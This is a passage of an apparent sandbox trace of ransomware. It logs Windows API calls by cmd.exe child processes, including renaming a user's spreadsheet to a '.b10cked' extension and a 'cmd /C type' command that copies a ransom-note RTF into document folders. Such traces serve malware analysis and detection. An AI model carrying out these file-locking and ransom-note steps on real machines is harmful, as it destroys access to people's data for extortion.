"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods")) returned 0x20 [0142.691] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods.b10cked"), dwFlags=0x3) returned 1 [0142.691] FindClose (in: hFindFile=0x1f0f08 | out: hFindFile=0x1f0f08) returned 1 [0142.692] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e870 | out: _Buffer=" 1") returned 9 [0142.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.692] GetFileType (hFile=0x7) returned 0x2 [0142.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e7fc | out: lpMode=0x16e7fc) returned 1 [0142.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.692] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e830 | out: lpConsoleScreenBufferInfo=0x16e830) returned 1 [0142.692] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.693] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16e870 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.693] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e854, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16e854*=0x1a) returned 1 [0142.693] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.693] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.694] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.694] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.694] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.694] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.694] SetConsoleInputExeNameW () returned 0x1 [0142.694] GetConsoleOutputCP () returned 0x1b5 [0142.694] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.694] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.694] exit (_Code=0) Process: id = "157" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xd7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14606 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14607 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14608 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14609 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14610 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14611 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14612 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14613 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14614 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14615 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15738 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15739 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15740 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15741 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 15742 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 15743 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15744 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15745 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15746 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15747 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15748 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15749 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15750 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15751 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15752 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 15753 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15754 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15755 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15756 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15757 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15758 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 15759 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 15760 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 15761 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 214 os_tid = 0xd70 [0140.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eff7c | out: lpSystemTimeAsFileTime=0x1eff7c*(dwLowDateTime=0x8db65b00, dwHighDateTime=0x1d440a9)) [0140.563] GetCurrentProcessId () returned 0xd7c [0140.563] GetCurrentThreadId () returned 0xd70 [0140.563] GetTickCount () returned 0x2c1f7 [0140.563] QueryPerformanceCounter (in: lpPerformanceCount=0x1eff74 | out: lpPerformanceCount=0x1eff74*=19735238217) returned 1 [0140.564] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.564] __set_app_type (_Type=0x1) [0140.564] __p__fmode () returned 0x76b331f4 [0140.564] __p__commode () returned 0x76b331fc [0140.564] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.564] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.564] GetCurrentThreadId () returned 0xd70 [0140.564] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd70) returned 0x38 [0140.565] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.565] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.565] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.565] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.565] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1eff0c | out: phkResult=0x1eff0c*=0x0) returned 0x2 [0140.565] VirtualQuery (in: lpAddress=0x1eff43, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.565] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.565] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.565] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.565] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.565] GetConsoleOutputCP () returned 0x1b5 [0140.565] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.566] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.566] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.566] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.567] GetEnvironmentStringsW () returned 0x2e0198* [0140.567] FreeEnvironmentStringsW (penv=0x2e0198) returned 1 [0140.567] GetEnvironmentStringsW () returned 0x2e0198* [0140.567] FreeEnvironmentStringsW (penv=0x2e0198) returned 1 [0140.567] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee7c | out: phkResult=0x1eee7c*=0x40) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0xc0, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x1, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x1, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x0, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x40, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x40, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x40, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.567] RegCloseKey (hKey=0x40) returned 0x0 [0140.568] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee7c | out: phkResult=0x1eee7c*=0x40) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x40, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x1, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x1, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x0, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x9, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x9, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x9, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.568] RegCloseKey (hKey=0x40) returned 0x0 [0140.568] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.568] srand (_Seed=0x5b88636f) [0140.568] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0140.568] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0140.568] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.568] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.569] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.569] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.569] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.569] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.569] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.569] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.569] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.569] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.569] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.569] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.569] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.569] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.569] GetEnvironmentStringsW () returned 0x2e22e8* [0140.569] FreeEnvironmentStringsW (penv=0x2e22e8) returned 1 [0140.569] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.569] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.569] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.569] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.569] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.569] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.570] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.570] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.570] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.570] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.570] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efc48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.570] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efc48, lpFilePart=0x1efc44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efc44*="Desktop") returned 0x18 [0140.570] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.570] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef9c4 | out: lpFindFileData=0x1ef9c4) returned 0x2e0028 [0140.570] FindClose (in: hFindFile=0x2e0028 | out: hFindFile=0x2e0028) returned 1 [0140.570] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef9c4 | out: lpFindFileData=0x1ef9c4) returned 0x2e0028 [0140.570] FindClose (in: hFindFile=0x2e0028 | out: hFindFile=0x2e0028) returned 1 [0140.570] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef9c4 | out: lpFindFileData=0x1ef9c4) returned 0x2e0028 [0140.571] FindClose (in: hFindFile=0x2e0028 | out: hFindFile=0x2e0028) returned 1 [0140.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.571] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.571] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.571] GetEnvironmentStringsW () returned 0x2e2b08* [0140.571] FreeEnvironmentStringsW (penv=0x2e2b08) returned 1 [0140.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.572] GetConsoleOutputCP () returned 0x1b5 [0140.572] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.572] GetUserDefaultLCID () returned 0x409 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efd88, cchData=128 | out: lpLCData="0") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efd88, cchData=128 | out: lpLCData="0") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efd88, cchData=128 | out: lpLCData="1") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.573] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.574] GetConsoleTitleW (in: lpConsoleTitle=0x2d08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.574] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.574] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.574] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.575] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.575] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.575] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.575] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.575] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.575] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.575] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.580] GetFileType (hFile=0x7) returned 0x2 [0140.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.999] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1efc80 | out: lpMode=0x1efc80) returned 1 [0141.000] _dup (_FileHandle=1) returned 3 [0141.000] _close (_FileHandle=1) returned 0 [0141.000] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0141.000] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf" 